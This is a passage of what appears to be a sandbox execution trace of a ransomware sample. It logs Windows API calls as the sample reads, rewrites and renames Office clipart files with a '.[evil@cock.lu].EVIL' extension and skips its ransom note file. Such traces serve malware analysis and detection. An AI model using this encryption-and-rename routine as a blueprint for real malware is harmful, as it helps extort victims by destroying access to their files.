Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.000] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.000] __uncaught_exception () returned 0x84b1160800 [0162.000] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.000] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00052_.wmf.[evil@cock.lu].evil")) returned 1 [0162.001] ??_V@YAXPEAX@Z () returned 0x1 [0162.004] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00052_.WMF", dwFileAttributes=0x200) returned 0 [0162.004] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.004] wcsstr (_Str="PE00231_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.004] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF") returned 69 [0162.004] wcscmp (_String1="PE00231_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.004] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00231_.WMF") returned 0x0 [0162.004] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF") returned 0x45 [0162.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.006] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b4, lpOverlapped=0x0) returned 1 [0162.021] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.021] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.021] _errno () returned 0x84b1160840 [0162.021] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.021] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0162.021] CloseHandle (hObject=0x1a8) returned 1 [0162.022] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.022] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.022] __uncaught_exception () returned 0x84b1160800 [0162.022] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.022] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00231_.wmf.[evil@cock.lu].evil")) returned 1 [0162.023] ??_V@YAXPEAX@Z () returned 0x1 [0162.026] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00231_.WMF", dwFileAttributes=0x200) returned 0 [0162.026] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.026] wcsstr (_Str="PE00272_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.026] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF") returned 69 [0162.026] wcscmp (_String1="PE00272_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.026] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00272_.WMF") returned 0x0 [0162.026] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF") returned 0x45 [0162.026] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.028] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaf4, lpOverlapped=0x0) returned 1 [0162.057] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.057] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.057] _errno () returned 0x84b1160840 [0162.057] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.057] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb00, lpOverlapped=0x0) returned 1 [0162.057] CloseHandle (hObject=0x1a8) returned 1 [0162.057] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.057] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.057] __uncaught_exception () returned 0x84b1160800 [0162.058] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.058] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00272_.wmf.[evil@cock.lu].evil")) returned 1 [0162.059] ??_V@YAXPEAX@Z () returned 0x1 [0162.062] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00272_.WMF", dwFileAttributes=0x200) returned 0 [0162.062] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.063] wcsstr (_Str="PE00468_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.063] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF") returned 69 [0162.063] wcscmp (_String1="PE00468_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.063] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00468_.WMF") returned 0x0 [0162.063] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF") returned 0x45 [0162.063] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.065] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5aa4, lpOverlapped=0x0) returned 1 [0162.073] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.073] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.073] _errno () returned 0x84b1160840 [0162.073] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.073] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x5ac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5ac0, lpOverlapped=0x0) returned 1 [0162.073] CloseHandle (hObject=0x1a8) returned 1 [0162.073] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.073] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.073] __uncaught_exception () returned 0x84b1160800 [0162.073] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.074] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00468_.wmf.[evil@cock.lu].evil")) returned 1 [0162.074] ??_V@YAXPEAX@Z () returned 0x1 [0162.077] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00468_.WMF", dwFileAttributes=0x200) returned 0 [0162.077] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.077] wcsstr (_Str="PE00478_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.077] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF") returned 69 [0162.077] wcscmp (_String1="PE00478_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.077] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00478_.WMF") returned 0x0 [0162.077] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF") returned 0x45 [0162.077] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.079] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1cf8, lpOverlapped=0x0) returned 1 [0162.096] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.096] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.096] _errno () returned 0x84b1160840 [0162.096] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.096] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d00, lpOverlapped=0x0) returned 1 [0162.096] CloseHandle (hObject=0x1a8) returned 1 [0162.096] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.096] __uncaught_exception () returned 0x84b1160800 [0162.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00478_.wmf.[evil@cock.lu].evil")) returned 1 [0162.101] ??_V@YAXPEAX@Z () returned 0x1 [0162.104] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00478_.WMF", dwFileAttributes=0x200) returned 0 [0162.104] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.104] wcsstr (_Str="PE00485_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.104] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF") returned 69 [0162.104] wcscmp (_String1="PE00485_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.104] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00485_.WMF") returned 0x0 [0162.104] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF") returned 0x45 [0162.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.106] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4124, lpOverlapped=0x0) returned 1 [0162.118] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.118] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.118] _errno () returned 0x84b1160840 [0162.118] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.118] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4140, lpOverlapped=0x0) returned 1 [0162.118] CloseHandle (hObject=0x1a8) returned 1 [0162.118] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.119] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.119] __uncaught_exception () returned 0x84b1160800 [0162.119] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.119] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00485_.wmf.[evil@cock.lu].evil")) returned 1 [0162.120] ??_V@YAXPEAX@Z () returned 0x1 [0162.122] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00485_.WMF", dwFileAttributes=0x200) returned 0 [0162.123] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.123] wcsstr (_Str="PE00489_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.123] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF") returned 69 [0162.123] wcscmp (_String1="PE00489_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00489_.WMF") returned 0x0 [0162.123] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF") returned 0x45 [0162.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.125] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1402c, lpOverlapped=0x0) returned 1 [0162.148] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.148] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.148] _errno () returned 0x84b1160840 [0162.148] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.148] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x14040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x14040, lpOverlapped=0x0) returned 1 [0162.149] CloseHandle (hObject=0x1a8) returned 1 [0162.149] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.149] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.149] __uncaught_exception () returned 0x84b1160800 [0162.149] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.149] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf.[evil@cock.lu].evil")) returned 1 [0162.151] ??_V@YAXPEAX@Z () returned 0x1 [0162.154] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF", dwFileAttributes=0x200) returned 0 [0162.154] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.154] wcsstr (_Str="PE00531_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.154] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF") returned 69 [0162.154] wcscmp (_String1="PE00531_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.154] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00531_.WMF") returned 0x0 [0162.154] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF") returned 0x45 [0162.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.157] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ee4, lpOverlapped=0x0) returned 1 [0162.245] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.245] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.245] _errno () returned 0x84b1160840 [0162.245] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.245] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f00, lpOverlapped=0x0) returned 1 [0162.245] CloseHandle (hObject=0x1a8) returned 1 [0162.245] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.245] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.245] __uncaught_exception () returned 0x84b1160800 [0162.245] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf.[evil@cock.lu].evil")) returned 1 [0162.247] ??_V@YAXPEAX@Z () returned 0x1 [0162.249] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF", dwFileAttributes=0x200) returned 0 [0162.249] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.249] wcsstr (_Str="PE00542_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.249] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF") returned 69 [0162.249] wcscmp (_String1="PE00542_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.249] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00542_.WMF") returned 0x0 [0162.249] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF") returned 0x45 [0162.250] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.251] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8da8, lpOverlapped=0x0) returned 1 [0162.305] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.305] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.305] _errno () returned 0x84b1160840 [0162.306] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.306] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x8dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8dc0, lpOverlapped=0x0) returned 1 [0162.306] CloseHandle (hObject=0x1a8) returned 1 [0162.306] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.306] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.306] __uncaught_exception () returned 0x84b1160800 [0162.306] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.306] MoveFileW (lpExistingFileName="C:\\\\Program 